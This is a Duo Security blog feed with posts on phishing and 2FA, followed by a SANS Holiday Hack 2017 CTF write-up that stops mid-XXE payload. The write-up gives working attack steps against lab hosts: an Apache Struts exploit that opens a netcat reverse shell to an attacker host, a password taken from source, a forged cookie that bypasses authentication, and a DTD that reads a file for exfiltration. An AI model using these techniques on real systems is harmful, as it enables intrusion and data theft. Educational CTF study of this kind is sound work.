Why would an attacker want to access your Gmail account? As detailed by Google's Enigma presentation, an account hijacker could export your list of contacts (consisting of family, friends and coworkers) and send them phishing links to potentially gain access to their accounts.

According to Google’s report, a hijacker can also reset your passwords to other services, download all of the your private data and remotely wipe data and backups.

Once compromised, hijackers will often search the email history of accounts for financial data and use the accounts for spamming/phishing their contacts. They also searched inboxes for financial records and credentials related to third-party services.

Google’s report referenced another report from 2014, Consequences of Connectivity: Characterizing Account Hijacking on Twitter that found 13.8 million compromised Twitter accounts were used to infect other users as well as to post spam. However, most users can avoid an account compromise by enabling two-step verification, aka, two-factor authentication.

]]>
<![CDATA[Phishing Campaign Targets U.S. Senators & Political Organizations]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/phishing-campaign-targets-us-senators-and-political-organizations https://duo.com/blog/phishing-campaign-targets-us-senators-and-political-organizations Industry News Thu, 18 Jan 2018 08:30:00 -0500

Pawn Storm (aka Fancy Bear) has been attempting to phish webmail accounts for many years now, targeting U.S. senators and political organizations across the world, according to a recent Trend Micro report (PDF).

Those include international and military organizations, Ministry of Defenses, Ministry of Foreign Affairs, intelligence units and defense contractors that provide IT services and engineering/robotics design for the U.S. government.

Reports of a campaign targeting the U.S. Senate comes amid the release of a separate Minority Staff Report (PDF) detailing the need to secure the 2018 and 2020 U.S. elections against foreign state hacking.

Phishing sites were set up last June to mimic the Senate's Active Directory Federation Services (ADFS) server, according to BankInfoSecurity. The server provides single sign-on access to multiple organizations' systems and applications.

While the U.S. Senate's ADFS server isn't Internet-facing, phishing their users' credentials can help attackers move laterally and target high-profile users of interest.

Additional Threat Techniques

The report describes the use of 'tabnabbing.' The hacking group sends an email to a user with a link - when the user clicks on it, it opens into a new tab, showing a legitimate news or conference website. The user's other tab, their webmail, is changed via JavaScript to a phishing site, prompting the user to log in again due to an expired session.

Another technique involves using stolen DNS administrator credentials to compromise the DNS settings of mail servers, changing them to point to a foreign server, according to Trend Micro. This allows an attacker to receive all incoming mail that would normally be sent to the victim organization. The Ministry of Foreign Affairs in an Eastern European country was the target of one such attack.

Finally, an analysis of the spear phishing email headers shows that the group's content strategy centers around using recent, newsworthy events to entice users to open the email messages.

Mitigation Recommendations

While two-factor authentication (2FA) can help stop attackers from logging into accounts with phished credentials, it's important to use the most secure method available.

SMS-based 2FA can be easily phished, rendering it less secure than using a physical security key to verify your identity before logging into webmail or other applications. An attacker would need physical access to your security key and laptop in order to compromise this method of authentication.

U2F, or Universal 2nd Factor, is an authentication standard developed by the FIDO (Fast IDentity Online) Alliance that uses strong public key cryptography to secure login access - it's been deployed by Facebook, Gmail, Salesforce.com, the U.K. government and many others, as noted by Yubico.

The method allows a user to tap a USB device plugged into their laptop to quickly and securely log in, protecting against phishing, man-in-the-middle and other threats. This method uses something you have to verify your identity.

Additional methods may include biometrics-based authentication, such as fingerprint ID, which has been integrated into consumer products such as iPhones and Android devices. This adds another layer of security to verify your identity through a different factor, known as something you are.

While phishing can work to steal passwords, malicious emails can also contain malware attachments used to infect and compromise devices. Users that log into your networks with infected devices can introduce new risks, and allow attackers entry. Endpoint security solutions can help you identify risky devices, encourage users to remediate, and block devices from logging into your company resources. When it comes to security protection, organizations need to ensure the trust of both users and their devices before granting them access.

]]>
<![CDATA[Moving from SecurID to Duo: A Customer’s Journey]]> isharpe@duo.com(Ian Sharpe) https://duo.com/blog/moving-from-securid-to-duo-a-customers-journey https://duo.com/blog/moving-from-securid-to-duo-a-customers-journey Product Updates Tue, 16 Jan 2018 00:00:00 -0500

In a previous blog post, we highlighted why customers are replacing RSA with Duo Security. We discussed how companies are leveraging Duo’s modern security solution to help them solve fundamental security challenges around access management. Additionally, we discussed other major drivers that propelled these companies to migrate from RSA, which included improved end user experience, easy and intuitive administration, and affordability.

If you are still determining if migrating from a legacy provider is the right direction for your organization, check out our ebooks. Our customers have found our Two-Factor Authentication Evaluation Guide and The Essential Guide To Securing Remote Access helpful in making an informed decision.

The Evolution of MFA

The modern workforce demands more flexibility and convenience. Their expectations on how enterprise security applications should function have changed based on the user experience they enjoy with consumer applications like Facebook. In their minds, ease of use and security should no longer be at odds.

We agree - that’s why we’re focused on ensuring security is simple for everyone. In our opinion, simplicity leads to security effectiveness across an organization. One of our core product design philosophies is creating an exceptional user experience for every user, regardless of their technical prowess. This ensures seamless and secure access to applications, systems and data with limited circumvention of security controls.

Another sign of the modernization and evolution of MFA was the updated NIST 800-63-3 Digital Identity Guidelines, which allows companies to leverage new forms of authenticators, such as Duo Push, as opposed to previous guidelines that recommended tokens. You can read more around these new changes here.

Ready for a Change

We understand that replacing a legacy provider can be a difficult journey. You have history and integrations. You thought things would change and get better; heck, they promised you that they would. Unfortunately, too many promises have been made with little-to-no delivery. You’ve come to the realization that the way it is, doesn’t need to continue. You are ready for a change.

Duo has assisted countless customers through migration from legacy providers. This migration has helped them advance their security programs while future-proofing their security technologies.

Our vision is to provide you a scalable security technology platform that aligns with your company’s long-term security strategy for access management.

3… 2… 1… Liftoff!

We have leveraged our experience with these customers and developed a comprehensive Liftoff Guide to ensure success during a migration. This guide consists of the following helpful components:

  • Success Planning: We take time to understand your environment, develop the proper solution architecture and decide which deployment method best meets your needs.
  • Application Configuration and Testing: We provide easy-to-search configuration documentation and best practice guides that help you get up and running quickly and independently.
  • End User Communication: We provide user-friendly email templates and resources to enable full transparency of the migration to your user population. It is one of the first steps toward showing your users just how easy being secure really is.
  • Help Desk Training: With change, your user population may have questions. Duo prides itself on being extremely user-friendly; however, in the event that you need additional help, we arm your support team with a “handy help desk guide.
  • Duo Go-Live: With those four simple steps, you are ready to make the change.

Duo Customer Journey

Want to learn more about how we can make you successful in your migration? Check out our Liftoff Guide.

Happy Customers

Duo is dedicated to making you successful. Here are a couple of testimonials from some of the customers we have helped migrate from legacy two-factor authentication providers.

“The transition from RSA tokens to Duo was seamless. Users love the solution. They find it easy to use and reliable; resulting in one less headache for IT.”

-- Ely Garcia, CTO, Cisneros Group of Companies

“The migration to Duo was seamless. Users new to MFA found the solution easy to use and understand. Individuals using our existing MFA, or who used different MFA providers at other institutions, were impressed with Duo’s intuitive functionality and have been very pleased with the transition.”

-- Chad Spiers, Director of Information Security, Sentara Healthcare

Making the Switch

Interested in getting additional insights about how Duo has helped hundreds of businesses make the switch from legacy two-factor authentication and access control solutions to our services? Join us at our upcoming Moving from RSA SecurID to Duo Security: A Customer’s Journey webinar on January 25, 2018 at 12:00pm EST | 9:00am PST.

]]>
<![CDATA[SANS Holiday Hack 2017 Writeup]]> jwright@duo.com(Jordan Wright)nsteele@duo.com(Nick Steele)pbruienne@duo.com(Pepijn Bruienne) https://duo.com/blog/sans-holiday-hack-2017-writeup https://duo.com/blog/sans-holiday-hack-2017-writeup Duo Labs Thu, 11 Jan 2018 08:30:00 -0500

Every year during the holiday season, SANS publishes their annual Holiday Hack Challenge. These challenges are a great way to learn new and useful exploitation techniques to solve fun puzzles.

The Duo Labs team always enjoys participating in the Holiday Hack Challenges, and have written about our solutions in the past. The challenges have been very polished, and this year is no exception.

As always, we first want to extend our thanks to Ed Skoudis and the SANS team for always putting together a thorough, fun challenge that never fails to teach something new.

The goal of this year’s Holiday Hack Challenge was to find out who has been throwing giant snowballs at the North Pole. This involves solving 8 various technical challenges, each containing both a main storyline challenge as well as a mini-challenge in the form of a “Cranberry Pi” terminal. As part of the solution, we are asked to collect 7 pages from The Great Book, which give information about who our villain might be.

It’s important to note that there is also a video game component to this years challenge, but to keep this write up short, we’ll only mention those solutions when they are relevant to the challenge solutions.


Table of Contents

  1. Problem 1 - The First Great Book Page
    1. Terminal - Winter Wonder Landing
  2. Problem 2 - Letters to Santa Application
    1. SSH Tunneling
    2. Terminal - Winconceivable: The Cliffs of Winsanity
  3. Problem 3 - The SMB Server
    1. Terminal: Cryokinetic Magic
  4. Problem 4 - Elf Webmail Server
    1. Terminal: There’s Snow Place Like Home
  5. Problem 5 - Santa’s Naughty or Nice List
    1. Terminal: Bumble to Stray
  6. Problem 6 - Elf-as-a-Service
    1. Terminal: I Don’t Think We’re In Kansas Anymore
  7. Problem 7 - SCADA System (EMI)
    1. Terminal: Oh Wait! Maybe We Are
  8. Problem 8 - Elf Database
    1. Terminal: We’re Off To See The...
  9. Problem 9 - Villain Reveal

Problem 1 - The First Great Book Page

Opening the Holiday Hack Challenge interface, we’re presented with a game map showing various levels we need to solve: Game Map

Terminal - Winter Wonder Landing

The terminal in the Winter Wonder Landing level presents the following prompt:

My name is Bushy Evergreen, and I have a problem for you.
I think a server got owned, and I can only offer a clue.
We use the system for chat, to keep toy production running.
Can you help us recover from the server connection shunning?
Find and run the elftalkd binary to complete this challenge.
elf@24e7eaaef2cc:~$

Standard searching tools like find and locate aren’t available, so we can use a mixture of ls and grep:

$ ls -alR | grep -B 5 elftalkd
./run/elftalk/bin:
total 7224
drwxr-xr-x 1 root root    4096 Dec  4 14:32 .
drwxr-xr-x 1 root root    4096 Dec  4 14:32 ..
-rwxr-xr-x 1 root root 7385168 Dec  4 14:29 elftalkd

Running the binary gives this output:

$ ./elftalkd 
        Running in interactive mode
        --== Initializing elftalkd ==--
Initializing Messaging System!
Nice-O-Meter configured to 0.90 sensitivity.
Acquiring messages from local networks...
--== Initialization Complete ==--
      _  __ _        _ _       _ 
     | |/ _| |      | | |     | |
  ___| | |_| |_ __ _| | | ____| |
 / _ \ |  _| __/ _` | | |/ / _` |
|  __/ | | | || (_| | |   < (_| |
 \___|_|_|  \__\__,_|_|_|\_\__,_|
-*> elftalkd! <*-
Version 9000.1 (Build 31337) 
By Santa Claus & The Elf Team
Copyright (C) 2017 NotActuallyCopyrighted. No actual rights reserved.
Using libc6 version 2.23-0ubuntu9
LANG=en_US.UTF-8
Timezone=UTC
Commencing Elf Talk Daemon (pid=6021)... done!
Background daemon...

And it tells us we completed the challenge. Here’s the question given in the storyline:

1) Visit the North Pole and Beyond at the Winter Wonder Landing Level to collect the first page of The Great Book using a giant snowball. What is the title of that page?

This was one of the few instances where The Great Book page is obtained by solving the video game challenge. After solving the level, we’re presented with our first Great Book page:

Title: “About This Book”
Hash: 6dda7650725302f59ea42047206bd4ee5f928d19

Problem 2 - Letters to Santa Application

Here’s the next question we’re asked to solve:

2) Investigate the Letters to Santa application at https://l2s.northpolechristmastown.com. What is the topic of The Great Book page available in the web root of the server? What is Alabaster Snowball's password?

Navigating to l2s.northpolechristmastown.com, we see a web application designed to let anyone send a letter to Santa: Santa Web App

Viewing the source of the page, we see this:

    <!-- Development version -->
    <a href="http://dev.northpolechristmastown.com" style="display: none;">Access Development Version</a>

Doing a quick check, we can see that dev.northpolechristmastown.com is located at the same IP address as l2s.northpolechristmastown.com:

$ nslookup dev.northpolechristmastown.com
Non-authoritative answer:
Name:   dev.northpolechristmastown.com
Address: 35.185.84.51
$ nslookup l2s.northpolechristmastown.com
Non-authoritative answer:
Name:   l2s.northpolechristmastown.com
Address: 35.185.84.51

This means that if we compromise the development instance, we will likely compromise the production application. Visiting the development URL, we see what appears to be a Toy Request Form.

At the bottom of the HTML source, we can see a message indicating the server is using Apache Struts:

    <div id="the-footer"><p class="center-it">Powered By: <a href="https://struts.apache.org/">Apache Struts</a></p></div>
    <!-- Friend over at Equal-facts Inc recommended this framework-->

It’s likely that we can leverage one of the recent high-profile vulnerabilities in Apache Struts to gain access to the server. This blog post from SANS points to revised code that exploits CVE-2017-9805 against Apache Struts. We can use this code to open an interactive reverse shell to a server we control using Netcat.

First, we’ll create a Netcat listener on our server:

$ nc -l -v -p 1234

Then, we can run the exploit against the developer instance, establishing the reverse shell:

python cve-2017-9805.py -u https://dev.northpolechristmastown.com/orders.xhtml -c "nc -e /bin/sh x.x.x.x 1234"

Back on our listener, we are given a shell that can be used to explore the system:

whoami
alabaster_snowball
ls var/www/html
css
fonts
GreatBookPage2.pdf
imgs
index.html
js
process.php
tom.html

Requesting https://l2s.northpolechristmastown.com/GreatBookPage2.pdf gives us the second page of The Great Book, which covers the topic of flying animals.

Title: “On the Topic of Flying Animals”
Hash: aa814d1c25455480942cb4106e6cde84be86fb30

Our next task is to find the password for alabaster_snowball. Digging through the system, we find the password stream_unhappy_buy_loss in one of the web application source files:

cat /opt/apache-tomcat/webapps/ROOT/WEB-INF/classes/org/demo/rest/example/OrderMySql.class
    public class Connect {
            final String host = "localhost";
            final String username = "alabaster_snowball";
            final String password = "stream_unhappy_buy_loss";
            String connectionURL = "jdbc:mysql://" + host + ":3306/db?user=;password=";

SSH Tunneling

Now that we have exploited the Letters to Santa server and retrieved Alabaster Snowball’s password, we can try to use the password to SSH to the server directly. This offers multiple benefits over our reverse shell, including the ability to easily tunnel connections to internal services.

Attempting to SSH to the server using the credentials alabaster_snowball:stream_unhappy_buy_loss works and puts us in a restricted shell:

holidayhack@holidayhack:~$ ssh alabaster_snowball@dev.northpolechristmastown.com
alabaster_snowball@hhc17-apache-struts2:/tmp/asnow.DizJJkLYXfIMeNPc1TIkEIed$

With this confirmed to be working, we can use SSH local tunneling to hit internal services through the Letters to Santa server. For example, to forward connections to TCP port 8888 on our client to TCP port 80 on internal_service.northpolechristmastown, we can establish an SSH session like this:

$ ssh -L 8888:internal_service.northpolechristmastown.com:80 -N alabaster_snowball@dev.northpolechristmastown.com

This creates a network flow like this: Network Flow

We will use this frequently in the remainder of the writeup to hit internal services.

Terminal - Winconceivable: The Cliffs of Winsanity

Opening the Cranberry Pi in the “Winconceivable: The Cliffs of Winsanity” level gives a prompt telling us we need to find a way to kill the santaslittlehelperd process:

My name is Sparkle Redberry, and I need your help.
My server is atwist, and I fear I may yelp.
Help me kill the troublesome process gone awry.
I will return the favor with a gift before nigh.
Kill the "santaslittlehelperd" process to complete this challenge.

We can use ps and grep to verify the process is running:

elf@07b771d93d82:~$ ps aux | grep santaslittlehelperd
elf          8  0.0  0.0   4224   724 pts/0    S    03:22   0:00 /usr/bin/santaslittlehelperd

But when we try to kill the process it doesn’t seem to work:

elf@07b771d93d82:~$ kill -9 8
elf@07b771d93d82:~$ ps aux | grep santaslittlehelperd
elf          8  0.0  0.0   4224   724 pts/0    S    03:22   0:00 /usr/bin/santaslittlehelperd

Looking through our aliases indicates that the various commands used to send signals to processes (such as kill, killall, etc.) have been aliased to true:

$ alias
alias egrep='egrep --color=auto'
alias fgrep='fgrep --color=auto'
alias grep='grep --color=auto'
alias kill='true'
alias killall='true'
alias l='ls -CF'
alias la='ls -A'
alias ll='ls -alF'
alias ls='ls --color=auto'
alias pkill='true'
alias skill='true'

To beat the challenge, we can just unalias the command and kill the process:

elf@f8ec669d6f52:~$ ps aux | grep santaslittlehelperd
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
elf          8  0.0  0.0   4224   640 pts/0    S    16:50   0:00 /usr/bin/santaslittlehelperd
elf@f8ec669d6f52:~$ unalias kill
elf@f8ec669d6f52:~$ kill -9 8
elf@f8ec669d6f52:~$ ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
elf          1  0.1  0.0  18028  2864 pts/0    Ss   16:50   0:00 /bin/bash /sbin/init
elf         12  0.0  0.0  18248  3324 pts/0    S    16:50   0:00 /bin/bash
elf         59  0.0  0.0  34424  2864 pts/0    R+   16:51   0:00 ps aux

Problem 3 - The SMB Server

Here’s the next question we’re asked to solve:

The North Pole engineering team uses a Windows SMB server for sharing documentation and correspondence. Using your access to the Letters to Santa server, identify and enumerate the SMB file-sharing server. What is the file server share name?

From our ssh tunnel, we do a nmap scan on the internal network and find that 10.142.0.7 and 10.142.0.8 have SMB services open:

$ nmap -v -Pn -p 139,445 10.142.0.0/24
Starting Nmap 7.40 ( https://nmap.org ) at 2018-01-04 17:15 UTC
Initiating Parallel DNS resolution of 256 hosts. at 17:15
Completed Parallel DNS resolution of 256 hosts. at 17:15, 0.04s elapsed
Initiating Connect Scan at 17:15
Scanning 256 hosts [2 ports/host]
Discovered open port 139/tcp on 10.142.0.7
Discovered open port 139/tcp on 10.142.0.8
Discovered open port 445/tcp on 10.142.0.8
Discovered open port 445/tcp on 10.142.0.7
Completed Connect Scan at 17:15, 2.40s elapsed (512 total ports)
<snip>
Nmap scan report for hhc17-smb-server.c.holidayhack2017.internal (10.142.0.7)
Host is up (0.0011s latency).
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

We can scan these hosts more aggressively (by using nmap’s -A flag) to enumerate them and discover that 10.142.0.7 resolves to hhc17-smb-server.c.holidayhack2017.internal while 10.142.0.8 resolves to hhc17-emi-server.c.holidayhack2017.internal.

Having identified the SMB service on 10.142.0.7 (the other host is the Elf-Machine Interface server used for problem 7), we can use the smbclient utility to access the service and list out the available shares. First, we set up a tunnel to the SMB server:

$ ssh -L 4445:10.142.0.7:445 -N alabaster_snowball@dev.northpolechristmastown.com

Next, we can enumerate through the possible shares by using Alabaster’s password to login:

$ smbclient --user=alabaster_snowball -p 4445 -L localhost
Enter alabaster_snowball's password:
Domain=[HHC17-EMI] OS=[Windows Server 2016 Datacenter 14393] Server=[Windows Server 2016 Datacenter 6.3]
    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    FileStor        Disk
    IPC$            IPC       Remote IPC
Connection to localhost failed (Error NT_STATUS_CONNECTION_REFUSED)
NetBIOS over TCP disabled -- no workgroup available

We see that there’s a sharename available for “FileStor” on the SMB Server. We can connect to that store and retrieve all the files like this:

$ smbclient \\\\localhost\\FileStor -U alabaster_snowball -p 4445
Enter alabaster_snowball's password:
Domain=[HHC17-EMI] OS=[Windows Server 2016 Datacenter 14393] Server=[Windows Server 2016 Datacenter 6.3]
smb: \> ls
  .                                   D        0  Wed Jan  3 04:30:56 2018
  ..                                  D        0  Wed Jan  3 04:30:56 2018
  BOLO - Munchkin Mole Report.docx      A   255520  Wed Dec  6 21:44:17 2017
  GreatBookPage3.pdf                  A  1275756  Mon Dec  4 19:21:44 2017
  MEMO - Password Policy Reminder.docx      A   133295  Wed Dec  6 21:47:28 2017
  Naughty and Nice List.csv           A    10245  Thu Nov 30 19:42:00 2017
  Naughty and Nice List.docx          A    60344  Wed Dec  6 21:51:25 2017
        13106687 blocks of size 4096. 9618575 blocks available
smb: \> mget *

This gives us 4 files we can use for further investigation, as well as page 3 of The Great Book.

Title: “The Great Schism”
Hash: 57737da397cbfda84e88b573cd96d45fcf34a5da

Terminal: Cryokinetic Magic

Visiting the Cryokinetic Magic level gives this prompt:

My name is Holly Evergreen, and I have a conundrum.
I broke the candy cane striper, and I'm near throwing a tantrum.
Assembly lines have stopped since the elves can't get their candy cane fix.
We hope you can start the striper once again, with your vast bag of tricks.
Run the CandyCaneStriper executable to complete this challenge.

Looking at the output of ls, we see that the file isn’t executable:

ls -alh CandyCaneStriper 
-rw-r--r-- 1 root root 45K Dec 15 13:28 CandyCaneStriper

There are two ways we can solve this challenge. First, since we have read permissions, we can make a copy of the file and then give executable permissions to our copy:

elf@87cf1577db7d:~$ cp CandyCaneStriper candy
elf@87cf1577db7d:~$ ls -alh
total 116K
drwxr-xr-x 1 elf  elf  4.0K Dec 15 17:29 .
drwxr-xr-x 1 root root 4.0K Dec  5 19:31 ..
-rw-r--r-- 1 elf  elf   220 Aug 31  2015 .bash_logout
-rw-r--r-- 1 root root 3.1K Dec 15 13:28 .bashrc
-rw-r--r-- 1 elf  elf   655 May 16  2017 .profile
-rw-r--r-- 1 root root  45K Dec 15 13:28 CandyCaneStriper
-rw-r--r-- 1 elf  elf   45K Dec 15 17:29 candy

However, after making our copy we find that we can’t use chmod, since it’s been nulled out:

elf@87cf1577db7d:~$ ls -alh /bin/chmod
-rwxr-xr-x 1 root root 0 Dec 15 13:40 /bin/chmod

There are tips on how to handle this here, with one being to use Perl to change the system permissions:

elf@87cf1577db7d:~$ perl -e 'chmod 0755, "candy"'
elf@87cf1577db7d:~$ ls -alh candy
-rwxr-xr-x 1 elf  elf   45K Dec 15 17:29 candy

Now we can execute the binary, solving the challenge:

elf@87cf1577db7d:~$ ./candy 
The candy cane striping machine is up and running!

The second way we can solve this challenge is by calling the /lib64/ld-linux-x86-64.so.2 shared library loader directly:

elf@44683555699a:~$ /lib64/ld-linux-x86-64.so.2 ./CandyCaneStriper 
The candy cane striping machine is up and running!

Problem 4 - Elf Webmail Server

The next question asks us to retrieve a Great Book page from the Elf Web Access (EWA) server:

4) Elf Web Access (EWA) is the preferred mailer for North Pole elves, available internally at http://mail.northpolechristmastown.com. What can you learn from The Great Book page found in an e-mail on that server?

A quick nmap scan of mail.northpolechristmastown.com through our SSH tunnel shows a couple of services available, but we’ll focus on the web application available on TCP port 80:

80/tcp   open  http    nginx 1.10.3 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/cookie.txt

In the process of enumerating services on the host, nmap found a robots.txt file that disallows requests to /cookie.txt. We can verify this manually by requesting mail.northpolechristmastown.com/robots.txt:

$ curl mail.northpolechristmastown.com/robots.txt
User-agent: *
Disallow: /cookie.txt

Requesting /cookie.txt reveals what appears to be source code for generating and verifying authentication cookies that was “accidentally” left on the server. You can find the full source here, but the snippet we’re interested in is responsible for decrypting and verifying the cookie contents:

var plaintext = aes256.decrypt(key, ciphertext);
//If the plaintext and ciphertext are the same, then it means the data was encrypted with the same key
if (plaintext === thecookie.plaintext) {
    return callback(true, username);
} else {
    return callback(false, '');
}

This code takes the provided JSON contents in the cookie and attempts to decrypt the ciphertext attribute using AES256 and an unknown key. If the decrypted contents match the plaintext provided in the cookie, it assumes the plaintext was generated by the server and can be trusted.

A hint given in this challenge suggests that, since we control the entire ciphertext, perhaps there could be odd behavior if we only send a 16 byte IV and don’t send any actual data.

Since it appears the encryption/decryption operates on base64 encoded data, it’s likely the AES256 library being used is something similar to this.

Let’s start by generating 16 bytes of random data as our IV and base64 encoding it to get our ciphertext:

$ echo -n "AAAAAAAAAAAAAAAA" | base64
QUFBQUFBQUFBQUFBQUFBQQ==

Then, we can try to decrypt this ciphertext using the aes256 package:

> var aes256 = require('aes256');
> aes256.decrypt('random key', 'QUFBQUFBQUFBQUFBQUFBQQ==')
''

We can see that by only sending 16 bytes, there isn’t any data to decrypt, causing the library to return an empty string. This means that by sending 16 bytes as our ciphertext, and an empty plaintext, the check will pass and we can log in as any user we want.

For example, to log in as alabaster.snowball@northpolechristmastown, we can use this cookie:

{"name":"alabaster.snowball@northpolechristmastown.com","plaintext":"","ciphertext":"QUFBQUFBQUFBQUFBQUFBQQ=="}

This logs us in to the webmail service: Elf Webmail Service

The emails in Alabaster’s inbox show that there are multiple users on the system. It would be useful to pull all the emails for every user and list those in an easy-to-read format. Looking through the Javascript on the page, we can see that sending and receiving emails is done via a JSON API at the /api.js endpoint. The file custom.js lists two of the possible API actions:

$.post( "api.js", { getmail: 'getmail'})
$.post( "api.js", { from_email: theuser, to_email: to, subject_email: subject, message_email: message})

The getmail action likely gets the emails for the currently logged on user. We can write a script that logs in as every user and retrieves all their emails, logging who the email is to, who the email is from, the subject, and the message.

The generated CSV contains an email from the elf Holly Evergreen containing a link to page 4 from The Great Book.

Title: The Rise of the Lollipop Guild
Hash: f192a884f68af24ae55d9d9ad4adf8d3a3995258

The question asks us what we learn from The Great Book page. In summary, we learn that there are rumors that a group of munchkins from Oz have infiltrated the North Pole in an attempt to disrupt Christmas operations.

Terminal: There’s Snow Place Like Home

The “There's Snow Place Like Home” level terminal gives the following prompt:

My name is Pepper Minstix, and I need your help with my plight.
I've crashed the Christmas toy train, for which I am quite contrite.
I should not have interfered, hacking it was foolish in hindsight.
If you can get it running again, I will reward you with a gift of delight.
total 444
-rwxr-xr-x 1 root root 454636 Dec  7 18:43 trainstartup

Using file, we see that the binary is compiled for ARM architectures, while we’re in an x86 architecture:

elf@887d4f25493d:~$ uname -a
Linux 887d4f25493d 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3 (2017-12-03) x86_64 x86_64 x86_64 GNU/Linux
elf@887d4f25493d:~$ file trainstartup 
trainstartup: ELF 32-bit LSB  executable, ARM, EABI5 version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=005de4685e8563d10b
3de3e0be7d6fdd7ed732eb, not stripped

We can run the binary with qemu-arm, solving the challenge:

$ qemu-arm ./trainstartup
    Merry Christmas
    Merry Christmas
You did it! Thank you!

Problem 5 - Santa’s Naughty or Nice List

Here’s the next question in the storyline:

5) How many infractions are required to be marked as naughty on Santa's Naughty and Nice List? What are the names of at least six insider threat moles? Who is throwing the snowballs from the top of the North Pole Mountain and what is your proof?

To find the number of infractions required, we used Santa’s Naughty and Nice list previously found on the SMB server, along with the list of infractions logged by the North Pole Police department on their website.

We can search the NPPD infraction database using a wildcard query such as status:* to retrieve all infractions with the option to download the infractions as a JSON file.

Now that we have the Naughty/Nice list as well as the full list of individual infractions, we can compare the two using a quick script to find the number of infractions required to be on the naughty list.

0 infractions - Nice: 14   Naughty: 0
1 infractions - Nice: 318  Naughty: 0
2 infractions - Nice: 95   Naughty: 0
3 infractions - Nice: 33   Naughty: 0
4 infractions - Nice: 0    Naughty: 26
5 infractions - Nice: 0    Naughty: 47
6 infractions - Nice: 0    Naughty: 6
7 infractions - Nice: 0    Naughty: 1
10 infractions - Nice: 0   Naughty: 1

Looks like after 4 infractions someone is put on the Naughty list.

To find the insider threat moles, we can use the list of infractions combined with the “Munchkin Mole Advisory” discovered on the SMB server: Munchkin Mole Advisory

The Munchkin Mole Report tells us about two moles: Boq Questrian and Bini Aru, who engaged in “throwing rocks” and “aggravated hair pulling” before disappearing.

When we look up the two moles on the NPPD’s site, we see that they each have 3 infractions, and Bini also has an infraction for giving atomic wedgies, aside from the hair pulling and rock-throwing mentioned in the mole advisory report. Assuming that wedgie-giving is also a munchkin activity, we filtered the list of infractions to find similar individuals.

We filtered under the criteria of characters that had committed one or more munchkin-related infractions above (wedgie-giving, hair-pulling, rock-throwing). After filtering, we have a list of 8 possible moles including the two mentioned in the mole report. We can then take this list and filter it down further to calculate their chance of being munchkin by getting the percentage of munchkin crimes relative to their total number of crimes. If we list out the possible moles with more than 50% chance of being a munchkin mole, we get:

Sheri Lewis | Munchkin Chance: 60.0% | Total Crimes: 5
Nina Fitzgerald | Munchkin Chance: 66.7% | Total Crimes: 6
Bini Aru | Munchkin Chance: 75.0% | Total Crimes: 4
Wesley Morton | Munchkin Chance: 100.0% | Total Crimes: 4
Boq Questrian | Munchkin Chance: 75.0% | Total Crimes: 4
Kirsty Evans | Munchkin Chance: 75.0% | Total Crimes: 4

So we can say with some certainty that these are the minimum six moles we were asked to find.

Terminal: Bumble to Stray

The terminal in this level gives the following prompt:

Minty Candycane here, I need your help straight away.
We're having an argument about browser popularity stray.
Use the supplied log file from our server in the North Pole.
Identifying the least-popular browser is your noteworthy goal.
total 28704
-rw-r--r-- 1 root root 24191488 Dec  4 17:11 access.log
-rwxr-xr-x 1 root root  5197336 Dec 11 17:31 runtoanswer

We can refer to this blog post for a helpful one-liner to parse out the least frequently seen user agents from the access logs:

awk -F\" '{print $6}' combined_log | sort | uniq -c | sort -fr

Looking at the bottom of the list, we see these values:

1 masscan/1.0
1 Dillo/3.0.5
1 curl/7.35.0

Only one of these, Dillo, is a browser so this is the answer to the challenge:

elf@64c67c7042d3:~$ ./runtoanswer 
Starting up, please wait......
Enter the name of the least popular browser in the web log: Dillo
That is the least common browser in the web log! Congratulations!

Beating the video game portion of this level, we obtain page 5 of The Great Book as well as this conversation: Bumble Convo

Title: The Abominable Snow Monster
Hash: 05c0cacc8cfb96bb5531540e9b2b839a0604225f

Problem 6 - Elf-as-a-Service

Here’s the next storyline question:

6) The North Pole engineering team has introduced an Elf as a Service (EaaS) platform to optimize resource allocation for mission-critical Christmas engineering projects at http://eaas.northpolechristmastown.com. Visit the system and retrieve instructions for accessing The Great Book page from C:\greatbook.txt. Then retrieve The Great Book PDF file by following those directions. What is the title of The Great Book page?

Running an nmap scan on eaas.northpolechristmastown.com confirms that this is a web application running on IIS:

Nmap scan report for eaas.northpolechristmastown.com (10.142.0.13)
Host is up (0.00031s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Index - North Pole Engineering Presents: EaaS!
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Visiting eaas.northpolechristmastown.com returns a page that lets you view and manage Elf orders. You can find the full source code here. Elf Order

In the HTML of the index page, we can see a link pointing to /Home/DisplayXml which claims to let us view our current orders:

<div class="col-md-4 col-lg-4">
    <a href='/Home/DisplayXML'><img src="/Content/img/o2.png" alt=""></a>
    <h4>EC2: Elf Checking System 2.0</h4>
    <p>To see your current orders, <a href="/Home/DisplayXML">click here</a></p>
</div>

Requesting this page gives a table of valid orders with the ability to upload a new file via a form:

<div class="row">
    <img src="/Content/img/o4.png" alt="">
    <h4>Need to make a change?</h4>
    <p>Upload a new form using the builder below
        <form action="/Home/DisplayXml" enctype="multipart/form-data" method="post">
            <input type="file" name="file" />
            <input type="submit" value="Upload" />
       </form>
    </p>
</div>

Seeing the path /Home/DisplayXml indicates that this endpoint is likely expecting an XML file to be uploaded. Allowing untrusted XML to be uploaded and processed can be dangerous and lead to XXE attacks. With this in mind, we can refer to a blog post from SANS on how to exploit XXE attacks in IIS.

First, we’ll set up a Document Type Definition (DTD) file to be hosted on our external server. This DTD file uploads the content of C:\greatbook.txt to our remote server as a URL parameter. We’ll call this file payload.dtd.

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % stolendata SYSTEM "file:///c:/greatbook.txt">
